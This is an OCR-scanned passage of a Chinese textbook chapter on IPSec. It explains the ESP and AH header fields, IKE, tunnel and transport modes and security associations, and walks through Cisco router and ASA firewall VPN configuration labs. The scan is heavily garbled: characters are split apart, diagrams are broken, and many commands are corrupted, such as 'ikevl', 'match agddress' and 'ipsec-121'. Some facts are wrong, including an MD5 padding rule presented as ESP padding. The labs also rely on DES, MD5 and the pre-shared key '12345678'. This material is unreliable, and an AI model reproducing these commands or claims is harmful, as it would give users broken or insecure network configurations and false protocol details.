者 用 它 封装 整个 IP 数据 报 。IANA 分 配给 ESP 一 个 协议 数值 50( 称 为 ESP 协议 分 配 数 )， 
在 ESP 头 前 的 协议 头 总 是 在 Next Head 字段 (IPv6) 或 “协议 ”(IPv4) 字 段 里 包含 该 值 。 
ESP 头 的 格式 如 图 7-8 所 示 。 


0 7 1 23 31 
ESP 安全 参数 索引 
关 部 序列 号 
有 效 载荷: 要 保护 的 数据 
( 变 长 ) 加 | 范 
范 
ESP 填充 项 (0~255B) 围 
本 填充 长 度 | 下 一 头 部 
ESP 验证 数据 
验证 数据 ( 变 长 ) 
图 7-8 ESP 头 的 格式 
ESP 报头 字段 包括 两 部 分 。 


(1) 安全 参数 索引 (Security Parameters Index,SPI) : 32 位 ,用 于 标识 有 相同 IP 地 址 和 
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相同 安全 协议 的 不 同 SA。 由 SA 的 创建 者 定义 .只 有 逻辑 意义 。 

(2) 序列 号 (Sequence Number) : 32 位 ,一 个 单项 递增 的 计数 器 ,用 于 防止 重 放 攻 击 ， 
SA 建立 之 初 初始 化 为 0, 序列 号 不 允许 重复 。 

ESP 报 尾 字段 包括 3 部 分 。 

(1) 填充 项 (Padding) : 0 一 255B。DH 算法 要 求 数据 长 度 ( 以 位 为 单位 ) 模 512 为 448， 
车 应 用 数据 长 度 不 足 , 则 用 扩展 位 填充 。 

(2) 填充 长 度 (Padding Length) : 接收 端 根 据 该 字段 长 度 去 除数 据 中 的 扩展 位 。 

(3) 下 一 个 报头 (Next Header) : 识别 下 一 个 使 用 IP 协议 号 的 报头 ,如 TCP 或 UDP。 

ESP 报 尾 字段 中 的 验证 数据 (Authentication Data,AD) 包 含 完 整 性 检查 和 。 完 整 性 检 
查 部 分 包括 ESP 报头 、 有 效 载荷 (应 用 程序 数据 ) 和 ESP 报 尾 。 

2. AH 协议 

AH 协议 (IP 协议 号 为 51) 提 供 数 据 源 认证 ,数据 完整 性 校 验 和 防止 报 文 重 放 功能 , 它 
能 保护 通信 和 免 受 算 改 ,但 不 能 防止 窃听 ,不 提供 数据 加 密 保护 ,适用 于 传输 非 机 密 数 据 。 
AH 的 工作 原理 是 在 每 一 个 数据 包 上 添加 一 个 身份 验证 报 文 头 , 此 报 文 头 插 在 标准 IP 包头 
后 面 , 对 数据 提供 完整 性 保护 。 可 选择 的 认证 算法 有 MD5、SHA-1 (Secure Hash 
Algorithm) 等 。MD5 算法 的 计算 速度 比 SHA-1 算法 快 ,而 SHA-1 算法 的 安全 强度 比 
MD5 算法 高 。 

除 此 之 外 ,AH 具有 ESP 的 所 有 其 他 功能 。AH 的 协议 分 配 数 为 51, AH 和 ESP 同时 
保护 数据 ,在 顺序 上 ,AH 在 ESP 之 后 ,一 般 来 说 IPSec 使 用 两 种 验证 算法 : MD5 和 
SHA-1l。 

AH 格式 如 图 7-9 所 示 。 


ET 


0 7 15 31 
下 一 头 部 载荷 长 度 保留 
安全 参数 索引 
序列 号 
验证 数据 
图 7-9 AH 格式 
AH 协议 头 各 字段 合 义 如 下 。 


下 一 头 部 : 8 位 ,标识 认证 头 后 面 的 下 一 个 负载 类 型 。 

载荷 长 度 : 8 位 ,表示 以 32 位 为 单位 的 AH 头 部 长 度 减 2, 默 认 值 为 4。 

保留 字段 : 16 位 ,保留 将 来 使 用 ,默认 值 为 0。 

安全 参数 索引 : 32 位 ,用 于 标识 有 相同 IP 地 址 和 相同 安全 协议 的 不 同 SA。 由 SA 的 
创建 者 定义 ,只 有 逻辑 意义 。 

序列 号 : 32 位 ,一 个 单 向 递增 的 计数 器 ,用 于 防止 重 放 攻击 ,SA 建立 之 初 初始 化 为 0， 
序列 号 不 允许 重复 。 

验证 数据 : 一 个 变 长 字段 , 即 Integrity Check Value, 由 SA 初始 化 时 指定 的 算法 来 计 
算 ,长度 为 32 位 的 整数 倍 。 

虽然 AH 和 ESP 都 可 以 提供 身份 认证 ,但 它们 是 有 区 别 的 。ESP 要 求 使 用 高 强度 的 加 

。214 。 


密 算法 ,会 受到 许多 限制 ;在 多 数 情况 下 .使 用 AH 的 认证 服务 已 能 满足 要 求 ,ESP 开销 相 
对 较 大 。 

在 实际 进行 IP 通信 时 ,可 以 根据 实际 安全 需求 同时 使 用 这 两 种 协议 或 选择 使 用 其 中 的 
一 种 。 虽 然 AH 和 ESP 都 可 以 提供 认证 服务 ,但 是 AH 提供 的 认证 服务 要 强 于 ESP。 如 果 
同时 使 用 AH 和 ESP ,设备 支持 的 AH 和 ESP 联合 使 用 的 方式 为 , 先 对 报 文 进行 ESP 封 
装 , 再 对 报 文 进行 AH 封装 ,封装 之 后 的 报 文 从 内 到 外 依次 是 原始 IP 报 文 .ESP 头 .AH 头 
和 外 部 IP 头 。 

3. IKE 协议 

IKE 协议 主要 是 对 密 钥 交换 进行 管理 ,用 于 协商 AH 和 ESP 所 使 用 的 密码 算法 ,并 将 
算法 所 需 的 必 备 密 钥 放 到 恰当 位 置 。 它 主要 包括 3 个 功能 : 一 是 对 使 用 的 协议 .加 密 算 法 
和 密 钥 进行 协商 ;二 是 方便 的 密 钥 交换 机 制 (这 可 能 需要 周期 性 地 进行 ); 三 是 跟踪 对 以 上 这 
些 约定 的 实施 。 

IKE 不 在 网 络 上 直接 传输 密 钥 ,而 是 通过 一 系列 数据 的 交换 ,最 终 计算 出 双方 共享 的 
密 钥 。 有 了 IKE,IPSec 的 很 多 参数 (如 密 钥 ) 都 可 以 自动 建立 ,避免 了 复杂 的 手工 配置 。 

此 外 还 有 安全 关联 (Security Association,SA)。 所 谓 安全 关联 是 指 安 全 服务 与 它 服 务 
的 载体 之 间 的 一 个 “连接 ”。AH 和 ESP 都 需要 使 用 SA. 而 IKE 的 主要 功能 就 是 SA 的 建 
立 和 维护 。 只 要 实现 AH 和 ESP 都 必须 提供 对 SA 的 支持 。 


7.4.3 IPSec 的 两 种 工作 模式 


IPSec 有 两 种 工作 模式 : 隧道 模式 和 传输 模式 。 传 输 模式 用 在 主机 到 主机 的 IPSec 通 
信 , 隧 道 模式 用 在 其 他 任何 方式 的 通信 ,如 图 7-10 所 示 。 


模式 
协议 传输 模式 隧道 模式 
AH 二 ji 数据 IP TAHTIP [ 数据 
ESP 而 | BSP | 数据 | ESP-T P| ESP | 数据 | BSP 
AH-ESP | [IP[AH| ESP| 数据 [ESPT| | [IP [AH|ESB| | 数据 [ES 


图 7-10 隧道 模式 和 传输 模式 下 的 数据 封装 形式 


隧道 (tunnel) 模 式 : 用 户 的 整个 IP 数据 包 被 用 来 计算 AH 或 ESP 头 ,AH 或 ESP 头 以 
及 ESP 加 密 的 用 户 数据 被 封装 在 一 个 新 的 IP 数据 包 中 , 即 在 外 部 与 内 部 IP 头 之 间 插 入 一 
个 IPSec 头 。 隧 道 模式 通常 应 用 于 两 个 安全 网 关 之 间 的 通信 。 安 全 隧道 两 端 所 选择 的 安全 
协议 必须 一 致 ,如 图 7-11 所 示 。 

传输 (transport) 模 式 : 只 是 传输 层 数据 被 用 来 计算 AH 或 ESP 头 ,AH 或 ESP 头 以 及 
ESP 加 密 的 用 户 数据 被 放置 在 原 IP 包头 后 面 。 通 常 ,传输 模式 应 用 在 两 台 主 机 之 间 的 通信 
或 一 台 主 机 和 一 个 安全 网 关 之 间 的 通信 .如 图 7-12 所 示 。 

当 数 据 包 从 传输 层 传送 给 网 络 层 时 .AH 和 ESP 会 进行 拦截 ,在 IP 头 与 上 层 协 议 之 间 
需 插入 一 个 IPSec 头 。 当 同时 应 用 AH 和 ESP 到 传输 模式 时 ,应 该 先 应 用 ESP, 再 应 
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图 7-11 隧道 模式 


加 密 的 TCP 会 话 


对 Cs 


图 7-12 传输 模式 


用 AH。 

NAT 和 AH IPSec 无 法 一 起 运行 ,因为 NAT 会 改变 IP 分 组 的 IP 地址 ,而 IP 分 组 的 
任何 改变 都 会 导致 AH 标识 被 破坏 。 当 两 个 IPSec 边界 点 之 间 采 用 了 PAT 功能 但 没有 设 
置 IPSec 流量 处 理 的 时 候 , IPSec 和 NAT 同样 无 法 协同 工作 。 另 外 ,在 传输 模式 下 ESP 
IPSec 不 能 和 PAT 一 起 工作 。 因 为 在 这 种 传输 模式 下 ,端口 号 受到 ESP 的 保护 ,而 端口 号 
的 任何 改变 都 会 被 认为 是 破坏 。 在 隧道 模式 的 ESP 情况 下 ,TCP/UDP 报头 是 不 可 见 的 ， 
因此 不 能 被 用 于 进行 内 外 地 址 的 转换 ,而 此 时 静态 NAT 和 ESP IPSec 可 以 一 起 工作 ,因为 
只 有 IP 地 址 要 进行 转换 ,对 高 层 协议 没有 影响 。 


7.4.4 IPSec 中 的 对 等 体 


IPSec 的 两 个 端点 被 称 为 是 IPSec 对 等 体 ,为 了 在 两 个 对 等 体 之 间 实 现 数据 的 安全 传 
输 , 就 要 在 两 者 之 间 建 立 安全 关联 (SA)。SA 是 IPSec 的 基础 ,也 是 IPSec 的 本 质 。SA 是 
通信 对 等 体 间 对 某 些 要 素 的 约定 ,例如 ,使 用 哪 种 协议 (AH 、ESP 还 是 两 者 结合 使 用 ) ,协议 
的 封装 模式 (传输 模式 还 是 隧道 模式 )、 加 密 算法 (DES、3DES 和 AES) .特定 流 中 保护 数据 
的 共享 密 钥 以 及 密 钥 的 生存 周期 等 。 

因为 SA 是 单 向 的 ,所 以 在 两 个 对 等 体 之 间 的 双向 通信 最 少 需要 两 个 SA 来 分 别 对 两 
个 方向 的 数据 流 进 行 安全 保护 。 如 果 两 个 对 等 体 希 望 同 时 使 用 AH 和 ESP 来 进行 安全 通 
信 , 则 每 个 对 等 体 都 会 针对 每 一 种 协议 来 构建 一 个 独立 的 SA。SA 是 具有 生存 周期 的 , 且 
只 对 通过 IKE 协商 建立 的 SA 有 效 , 手 工 方式 建立 的 SA 永 不 老化 。IKE 协商 建立 的 SA 
的 生存 周期 有 两 种 定义 方式 : 基于 时 间 的 生存 周期 ,定义 了 一 个 SA 从 建立 到 失效 的 时 间 ; 
基于 流量 的 生存 周期 ,定义 了 一 个 SA 允许 处 理 的 最 大 流量 。 

生存 时 间 到 达 指 定 的 时 间或 指定 的 流量 ,SA 就 会 失效 。SA 失效 前 ,IKE 将 为 IPSec 
协商 建立 新 的 SA, 这样, 在 旧 的 SA 失效 前 .新 的 SA 就 已 经 准备 好 。 在 新 的 SA 开始 协商 
而 没有 协商 好 之 前 ,继续 使 用 旧 的 SA 保护 通信 。 在 新 的 SA 协商 好 之 后 , 则 立即 采用 新 的 
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SA 保护 通信 。 
7.4.5 IPSec VPN 的 配置 步骤 


IPSec VPN 的 一 般配 置 步骤 如 下 。 
步骤 1: 设置 认证 策略 。 
例如 : 


crypto isakmp policy 1 ! 配 置 IKE 策略 ,1 是 策略 号 (优先 级 1 一 10000,1 为 最 高 级 别 ) 

authentication pre- share ! 使 用 预 共享 密码 

group 2 ! 设 置 为 1024 位 的 Diffie- Hellman, 加 密 算 法 默认 为 DES 
! group 1 使 用 的 是 768 位 密码 

life time 3600 ! 生 存 时 间 ,两 端 要 设置 成 一 样 ,默认 是 86 400s, 否 则 将 以 短 的 时 间 
! 为 中 断 进 行 更 新 

步骤 2: 设置 预 共 享 密码 。 

例如 


crypto isakmp key mykey address 192.168.4.1 ! 设 置 远程 对 等 体 共 享 密码 


其 中 ,mykey 表示 密码 ,192. 168. 4. 1 为 对 方 实体 地 址 。 
步骤 3: 设置 访问 控制 列表 (使 用 扩展 的 访问 控制 列表 ) 。 
例如 : 


access- list 101 permit ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255 


允许 源 地 址 192. 168. 1. 0 子 网 访问 目标 192. 168. 2. 0 子 网 ,其 中 192. 168. 1. 0 为 本 地 子 网 ， 
192. 168. 2.0 为 目标 子 网 。 上 例 定义 哪些 地 址 的 报 文 加 密 或 是 不 加 密 。 

步骤 4: 设置 交换 集 。 

例如 : 

crypto ipsec transform- set myset esp- 3des esp- sha- hmac 
上 例 设置 一 个 名 为 myset 的 交换 集 , ESP 隧道 加 密 采 用 ESP-3DES, 认 证 采用 ESP-SHA- 
HMAC, 

传输 模式 下 有 两 种 隧道 模式 : AH 隧道 和 ESP 隧道 。 

AH 隧道 参数 : ah-md5-hmac | ah-sha-hmac 

ESP 隧道 参数 : esp-des | esp-aes |esp-3des | esp-md5-hmac | esp-sha-hmac 

步骤 5: 创建 加 密 图 。 

例如 : 

crypto map mymap 10 ipsec- isakmp 

! 设 置 加 密 图 ,名 称 为 mymap, 序 号 为 10, 使 用 IKE 来 建立 IPsec 安全 关联 


set peer 192.168.4.1 ! 设 置 隧道 对 端 IP 地 址 
set transform- set myset ”! 将 加 密 图 应 用 在 myset 交换 集 上 
match address 101 ! 设 置 匹配 101 号 访问 列表 


步 又 6: 在 接口 上 应 用 。 
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例如 : 


int fastethernet0/0 ! 进 入 F0/0 接 口 
crypto map mymap ! 将 加 密 图 应 用 于 此 接口 


在 配置 IPSec VPN 时 ,常用 的 相关 命令 有 以 下 几 种 。 

show crypto isakmp policy: 显示 所 有 存在 的 ISAKMP 策略 (包括 默认 策略 ) 。 

show crypto isakmp sa: 显示 ISAKMP SA 的 建立 情况 。 

clear crypto isakmp sa: 清除 已 建立 的 ISAKMP SA 。 

debug crypto isakmp: 显示 有 关 ISAKMP 事件 的 debug 信息 。 

show crypto ipsec sa: 显示 建立 的 IPSec SA。 

show crypto ipsec transform-set: 显示 所 有 的 变换 集合 。 

show crypto map: 显示 所 有 的 加 密 映 射 集合 。 

clear crypto sa: 删除 相关 IPSec 安全 联盟 数据 库 。 

debug crypto ipsec: 显示 所 有 IPSec SA 的 相关 协商 信息 。 

debug crypto packer: 在 IPSec 处 理 过 程 中 ,查看 IPSec 对 于 上 层 数 据 处 理 的 信息 。 

其 中 ,debug 命令 相当 重要 。 通 过 debug 信息 ,可 以 知道 协商 的 主动 发 起 方 是 本 端 还 是 
对 端 。 

如 果 在 一 次 协商 的 debug 信息 开始 处 有 ”"ISAKMP: received initiate-msg from core” 字 
符 串 的 出 现 , 则 表明 IKE 协商 是 由 本 端 主动 发 起 的 。 

如 果 在 一 次 协商 的 debug 信息 开始 处 有 “ISAKMP: received packet from XXX.Xxx 
Xx. XXx. Xxx”( 其 中 ,XXX. Xxx. Xxx. Xxx 表示 一 个 IP 地 址 ), 则 表明 IKE 
协商 是 由 对 端 主动 发 起 的 。 

在 随后 的 debug 信息 中 ,表示 的 是 某 一 阶段 (第 一 阶段 或 第 二 阶段 ) 的 协商 ,如 果 在 这 段 
信息 中 有 “ISAKMP(X X X): processing ISAKMP-SA payload. ”( 其 中 , X Xx XX 表示 一 个 
状态 标识 符 ) , 则 表明 这 一 段 debug 信息 是 关于 第 一 阶段 协商 的 。 

如 果 在 这 段 信 息 中 有 “ISAKMP( Xx X X): processing IPSec-SA payload. "(其 中 ,Xx 
X 表 示 一 个 状态 标识 符 ) , 则 表明 这 一 段 debug 信息 是 关于 第 二 阶段 协商 的 。 

实验 7-1 LAN-to-LAN VPN 实验 

【实验 目的 】 

(1) 理解 IPSec 协议 在 网 络 安全 中 的 作用 。 

(2) 理解 卫 层 数据 加 密 与 数据 源 验证 的 原理 。 

(3) 掌握 实现 IPSec VPN 的 典型 配置 方法 。 

【实验 原理 】 

VPN 可 以 连接 两 个 终端 系统 ,也 可 以 连接 多 个 网 络 。VPN 是 使 用 隧道 和 加 密 技 术 来 
组 建 的 ,是 一 种 WAN 基础 设施 蔡 代 品 , 可 用 于 替代 或 拓展 现 有 的 私有 网 络 。 在 很 多 情况 
下 ,VPN 有 很 多 优 于 传统 WAN 连接 的 地 方 ,如 费用 低廉 ,易于 安装 、 能 够 迅速 增加 带宽 等 。 

VPN 提供 了 以 下 3 种 主要 功能 。 

(1) 加 密 : 通过 网 络 传输 分 组 之 前 ,发 送 方 可 对 其 进行 加 密 。 这 样 可 以 防止 窃听 。 

(2) 数据 完整 性 : 接收 方 可 检查 数据 在 通过 Internet 传输 的 过 程 中 是 否 被 修改 ,这 样 可 
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以 防止 算 改 。 

(3) 来 源 验证 : 接收 方 可 验证 发 送 方 的 身份 ,确保 信息 来 自 正确 的 地 方 ,这 样 可 以 防止 
仿造 。 

虚拟 专用 网 是 通过 隧道 方式 在 同一 条 标准 IP 连接 上 传输 多 种 协议 来 实现 的 ,一 些 网 络 
操作 系统 (例如 锐 捷 网 络 操 作 系 统 ) 支 持 的 3 种 隧道 化 方法 是 通用 路 由 选择 封装 (GRE) 、 第 
二 层 隧道 协议 (L2TP) 和 IPSec。 虚 拟 专 用 网 支持 保密 性 、 完 整 性 和 身份 验证 ,通过 对 数据 
流 进行 加 密 并 使 用 IPSec 协议 ,使 得 数据 流通 过 公共 基础 设施 传输 时 ,其 身份 验证 与 私有 网 
络 中 的 相同 。 

IPSec 协议 族 是 IETF 制定 的 一 系列 协议 , 它 为 IP 数据 报 提 供 了 高 质量 的 .可 互 操作 
的 .基于 密码 学 的 安全 性 。 特 定 的 通信 方 之 间 在 IP 层 通过 加 密 与 数据 源 验证 等 方式 来 保证 
数据 报 在 网 络 上 传输 时 的 私有 人 性、 完整 性 真实 性 和 防 重 放 。 

【实验 拓扑 】 

本 实验 的 拓扑 结构 如 图 7-13 所 示 。 


172.18.186.242/23 


| 1 1 1 
| 1 1 1 
1 E 0/0 1 1 
| 2 和 防 炎 墙 “| | 防火 墙 ”| 
| ASAS5S10-CSC | | ASAS510-CSC [ 
| EO/ | 192.168.10.124 |! ! E 0/1 | 192.168.20.1/24 | 
| VLAN 10 | ! VLAN 20 ! 
| 192.168.10.2/24 | | 192.168.20.2/24 | 
1 1 1 1 
Cisco2911 | | Cisco1841 | 
| 1 1 1 
! ! G 0/2 | 192.168.21.1/24 | 
| VLAN 1 | ! VLAN21 | 
上 1 1 1 
上 | 1 1 
上 1 1 1 
| WS-C3560 | | WS-C3560 | 

1 1 
| 1 | 1 
| VLAN 11 | VLAN21 | 
| F 00 | F 0/0 | 
上 1 1 1 
1 组 1 1 1 组 2 1 
| 由 192.168.11.0/24 | ! 有 1 
上 1 1 1 
上 1 1 1 
Ue 】 EE 1 

图 7-13 LAN-to-LAN VPN 实验 拓扑 
【实验 设备 】 


路 由 器 两 台 , 防 火 墙 两 台 ,三 层 交 接 机 两 台 . 直 连 线 (或 交叉 线 ) 若 干 条 。 

【实验 内 容 】 

(1) 搭建 本 地 配置 环境 ,IPSec VPN 配置 要 求 为 : 安全 协议 采用 ESP 协议 ,加 密 算法 采 
用 DES, 验 证 算法 采用 ESP-MD5-HMAC。 
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(2) 按 拓扑 结构 组 网 ,在 路 由 器 之 间 建 立 一 个 安全 隧道 ,对 子 网 (组 1 和 组 2) 之 间 的 数 
据 流 进行 安全 保护 。 

(3) 从 子 网 组 1 向 子 网 组 2 发 送 数 据 包 ,对 配置 结果 进行 验证 。 

【实验 步骤 】 

分 析 : 按照 VPN 配置 步骤 完成 配置 后 ,理论 上 传输 的 流 是 安全 的 。 能 否 捕获 VPN 流 
的 数据 包 以 分 析 其 安全 性 ? 一 个 合理 的 思路 应 该 是 : 在 完成 基本 配置 ,全 网 连通 时 测试 其 
通信 的 安全 性 ,在 启用 IPSec 协议 后 设法 抓 取 数据 包 , 测 试 数据 的 安全 性 。 通 过 IPSec 实验 
前 后 数据 安全 性 的 对 比 来 验证 IPSec 的 安全 性 。 

步骤 1: 确定 加 密 策略 。 

(1) 根据 已 给 条 件 , 将 IPSec 加 密 策略 细节 填 和 人 下 表 : 


策 略 主机 A 主机 B 


变换 集 

对 等 体 主 机 名 

对 等 体 IP 地 址 

要 加 密 来 自 哪些 主机 的 数据 流 
要 加 密 的 分 组 类 型 

SA 建立 方式 


(2) 显示 所 有 存在 的 ISAKMP 策略 (包括 默认 策略 ) : 
show crypto isakmp policy (show isakmp policy on a PIX) 
(3) 显示 所 有 的 变换 集合 : 

show crypto ipsec transform set 

(4) 显示 已 建立 的 ISAKMP SA 

Show crypto isakmp sa (show isakmp sa on a PIX) 

(5) 显示 建立 的 IPSec SA: 

Show crypto ipsec sa 

(6) 显示 所 有 的 加 密 映射 集合 : 

show crypto map 


步骤 2: 配置 防火 墙 。 
(1) 子 网 组 1 防火 墙 配置 ， 


hostname (config)#interface ethernet0 // 进 入 防火 墙 外 网 接口 
hostname (config- if)#ip address 172.18.186.241 255.255.255.0 // 定 义 IP 地 址 
hostname (config- if)#nameif outside // 定 义 接口 名 称 为 outside 
hostname (config- if)#no shutdown // 开 启 接 口 
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hostname (config)#crypto ikevl policy 1 // 进入 IPsec IKEv1 策略 配置 模式 


hostname (config- ikev1- policy)#authentication pre- share 


// 定 义 认证 方法 为 共享 密 钥 
hostname (config- ikev1- policy)#encryption 3des // 配 置 加 密 方式 为 3DES 
hostname (config- ikev1- policy)#hash sha // 配 置 SMAC 方 法 为 SHA-1 
hostname (config- ikev1- policy)#group 2 // 配 置 Diffie- Hellman 群 为 2 


hostname (config- ikev1-Policy)#1ifetime seconds 43200 
// 配 置 加 密 密 钥 的 存活 时 间 为 43 200s 


hostname (config)#crypto ikevl enable outside // 在 外 网 接口 激活 IKEv1 

hostname (config)#crypto ikev2 Policy 1 // 进入 IPsec IKEv2 策略 配置 模式 
hostname (config- ikev2- policy)#encryption 3des // 配 置 加 密 方式 为 3DES 

hostname (config- ikev2- policy)#group 2 // 配 置 Diffie-Hellman 群 为 2 
hostname (config- ikev12- policy)#prf sha // 配 置 HMRAC 方法 为 SHA-1 


hostname (config- ikev2- policy)#lifetime seconds 43200 

// 配 置 加 密 密 钥 的 存活 时 间 为 43 200s 
hostname (config)#crypto ikev2 enable outside // 在 外 网 接口 激活 IKEv2 
hostname (config)#crypto ipsec ikev] transform- set FirstSet esp- 3des esp- md5- hmac 
// 全 局 配置 IPSec 加 密 传输 集 Firstset, 采 用 ESP- 3DES 加 密 、ESP-MD5- EMAC 认证 
hostname (config)#crypto ipsec ikev2 ipsec-proposal secure 

// 进 入 IPSec IKEv2 安全 协议 配置 
hostname (config- ipsec- proposal)#protocol esp encryption 3des aes des 

// 配 置 协议 ESP 和 加 密 类 型 
hostname (config- ipsec- proposal)#protocol esp integrity sha-1 

// 配 置 协议 ESP 和 完整 性 检查 类 型 
// 配 置 感 兴趣 的 业务 流 , 也 就 是 从 本 地 内 网 到 对 端 内 网 的 业务 流 
access- list 121 extended permit ip 192.168.10.0 255.255.255.0 192.168.20.0 255.255.255.0 
access- list 121 extended permit ip 192.168.11.0 255.255.255.0 192.168.20.0 255.255.255.0 
access- list 121 extended permit ip 192.168.10.0 255.255.255.0 192.168.21.0 255.255.255.0 
access- list 121 extended Permit ip 192.168.11.0 255.255.255.0 192.168.21.0 255.255.255.0 
hostname (config)#tunnel- group 172.18.186.142 type ipsec- 121 

// 配 置 一 个 tunnel- group 对 端 
hostname (config)#tunnel- group 172.18.186.142 ipsec- attributes 

// 进 入 ipsec-attributes 配置 模式 
hostname (config- tunnel- ipsec)#ikev1l pre- shared- key 12345678 

// 配 置 tunnel 共享 密 钥 


定义 名 称 为 abcemap 的 crypto map: 


hostname (config)#crypto map abcmap 1 match address 121 
// 关 联 ACL 到 crypto map 
hostname (config)#crypto map abcmap 1 set Peer 172.18.186.142 
// 标 识 IPSec 连接 的 对 端 
hostname (config)#crypto map abcmap 1 set ikevl transform- set FirstSet 
// 关 联 集 FirstSet 到 crypto map 
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hostname (config)#crypto map abcmap 1 set ikev2 ipsec-proposal secure 

// 关 联 IKEv2 安 全 协议 到 crypto map 
hostname (config)#crypto map abcmap interface outside 

// 应 用 crypto map abamap 到 外 部 接口 


hostname (config)#write memory // 保 存 配 置 
(2) 子 网 组 2 防火 墙 配置 : 
hostname (config)#interface ethernet0 // 进 入 防火 墙 外 网 接口 
hostname (config- if)#ip address 172.18.186.242 255.255.255.0 // 定 义 IP 地 址 
hostname (config- if)#nameif outside // 定 义 接口 名 称 为 outside 
hostname (config- if)#no shutdown // 开 启 接口 
hostname (config)#crypto ikev1l policy 1 // 进 入 IPSec IKEv1 策略 配置 模式 
hostname (config- ikevl- policy)#authentication pre- share 

// 定 义 认证 方法 为 共享 密 钥 
hostname (config- ikev1- policy)#encryption 3des // 配 置 加 密 方式 为 3DES 
hostname (config- ikev1- policy)#hash sha // 配 置 BMAC 方 法 为 SHA-1 
hostname (config- ikev1- policy)#group 2 // 配 置 Diffie-Hellman 群 为 2 


hostname (config- ikev1- Policy)#1ifetime seconds 43200 
// 配 置 加 密 密 钥 的 存活 时 间 为 43 200s 


hostname (config)#crypto ikevl enable outside // 在 外 网 接口 激活 IKEv1 
hostname (config)#crypto ikev2 policy 1 // 进 入 IPSec IKEv2 策略 配置 模式 
hostname (config- ikev2- policy)#encryption 3des // 配 置 加 密 方式 为 3DES 

hostname (config- ikev2- policy)#group 2 // 配 置 Diffie- Hellman 群 为 2 
hostname (config- ikev12- policy)#prf sha // 配 置 HMAC 方 法 为 SHA- 1 


hostname (config- ikev2- Policy)#1ifetime seconds 43200 

// 配 置 加 密 密 钥 的 存活 时 间 为 43 200s 
hostname (config)#crypto ikev2 enable outside // 在 外 网 接口 激活 IKEv2 
hostname (config)#crypto ipsec ikevl transform- set FirstSet esp- 3des esp- md5- hmac 
// 全 局 配置 IPSec 加 密 传输 集 FirstSet, 采 用 ESP- 3DES 加 密 、ESP-MD5- EMAC 认证 。 
hostname (config)#crypto ipsec ikev2 ipsec- proposal secure 

// 进 入 IPsec IKEv2 安全 协议 配置 
hostname (config- ipsec- Proposal)#Protocol esp encryption 3des aes des 

// 配 置 协议 ESP 和 加 密 类 型 
hostname (config- ipsec- Proposal)#Protocol esp integrity sha-1 

// 配 置 协议 ESP 和 完整 性 检查 类 型 
// 配 置 感 兴趣 的 业务 流 , 也 就 是 从 本 地 内 网 到 对 端 内 网 的 业务 流 
access- list 121 extended Permit ip 192.168.20.0 255.255.255.0 192.168.10.0 255.255.255.0 
access- list 121 extended permit ip 192.168.20.0 255.255.255.0 192.168.11.0 255.255.255.0 
access- list 121 extended Permit ip 192.168.21.0 255.255.255.0 192.168.10.0 255.255.255.0 
access- list 121 extended Permit ip 192.168.21.0 255.255.255.0 192.168.11.0 255.255.255.0 
hostname (config)#tunnel- group 172.18.186.141 type ipsec- 121 

// 配 置 一 个 tunnel- group 对 端 
hostname (config)#tunnel- group 172.18.186.141 ipsec-attributes 
// 进入 ipsec-attributes 配置 模式 
hostname (config- tunnel- ipsec)#ikev1l pre- shared- key 12345678 
二 


定义 名 称 为 abcmap 的 crypto map: 


hostname (config)#crypto map abcmap 1 match agddress 121 

// 关 联 ACL 到 crypto map 
hostname (config)#crypto map abcmap 1 set peer 172.18.186.141 

// 标 识 IPSec 连接 的 对 端 
hostname (config)#crypto map abcmap 1 set ikev] transform- set FirstSet 

// 关 联 集 FirstSet 到 crypto map 
hostname (config)#crypto map abcmap 1 set ikev2 ipsec-proposal secure 

// 关 联 IKEV2 安全 协议 到 crypto map 
hostname (config) #crypto map abcmap interface outside // 应 用 crypto map abcmap 到 外 部 接口 


步骤 3: 验证 测试 。 

通过 组 1 路 由 器 ping 组 2 路 由 器 的 IP 地 址 192. 168. 21. 1 进行 VPN 业务 测试 ,如 果 
ping 通 , 则 测 业务 正常 。 

(1) 显示 所 有 尝试 协商 的 策略 以 及 最 后 的 默认 策略 设置 : 


#show crypto isakmp policy 

(2) 显示 在 路 由 器 上 设置 的 transform-set: 
#show crypto ipsec transform- set 

(3) 显示 当前 安全 联盟 使 用 的 设置 : 

#show crypto ipsec sa 

(4) 显示 所 有 配置 在 路 由 器 上 的 crypto map: 


#show crypto map 


(5) 能 抓 取 到 VPN 数据 包 吗 ? 如 能 ,请 分 析 AH、ESP 头 ,分 析 数 据 流 的 加 密 情 况 , 否 
则 说 明 原因 。 

【实验 思考 】 

实验 过 程 中 ,能 捕获 VPN 数据 包 吗 ? 如 果 能 ,请 分 析 AH、ESP 头 , 分 析 数 据 流 的 加 密 
情况 ;如 果 不 能 ,讨论 可 能 的 办 法 (提示 : 重点 解决 VPN 数据 包 的 捕获 问题 ,可 增加 设备 或 
适当 改变 拓扑 ) 。 
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实验 7-2 Windows IPSec VPN 实验 

【实验 目的 】 

(1) 创建 IPSec 策略 。 

(2) 定义 IPSec 筛选 器 列表 (filter list) 。 

(3) 配置 IPSec 筛选 器 操作 (filter action) 。 

(4) 配置 身份 验证 方法 。 

【实验 拓扑 】 

本 实验 的 拓扑 结构 如 图 7-14 所 示 。 

(1) 主机 到 主机 的 IPSec VPN 的 网 络 拓 扑 如 图 7-14 所 示 。 


主机 A 主机 B 
IPSec 通道 
已 ED 已 
172.20.x.x 172.20.y.y 


图 7-14 主机 到 主机 实验 拓扑 


A: 本 地 主机 ,以 IP 地 址 172. 20. x. x 为 例 。 
B: Windows 实验 台 , 以 IP 地址 172. 20. y. y 为 例 。 
(2) 网 关 到 网 关 的 IPSec VPN 的 网 络 拓扑 如 图 7-15 所 示 。 


加 密 隧道 


站 弓 

' ' ' 
z L | 

1 2 1 
11722232016 | | 
| ! | 
1 | | 
1 l | 


172.22.3.y/16 172.21.3.y/16 
172.21.1.y/16 


图 7-15 网 关 到 网 关 实 验 拓扑 


网 关 到 网 关 实 验 以 两 人 一 组 (A、B) 的 形式 进行 。 其 中 : 

主机 A 的 本 地 IP 为 172. 20. 1. x/16,Windows 实验 台 A 的 两 个 (内 外 网 )IP 分 别 为 
20. 3. x/16 和 172. 22. 3. x/16。 

主机 也 的 本 地 IP 为 172. 21. 1.y/16，Windows 实验 台 B 的 两 个 (内 外 网 )IP 分 别 为 
36 2 2 3 16, 

【实验 步骤 】 

分 析 : 请 根据 理解 自行 写 出 。 

请 读者 按 配置 要 点 完成 实验 ,包括 实验 截图 。 其 中 ,对 网 卡 的 配置 要 求 用 命令 行 命令 。 
实验 一 ”主机 到 主机 实验 步骤 。 

步骤 1: 配置 主机 并 检查 连通 性 。 

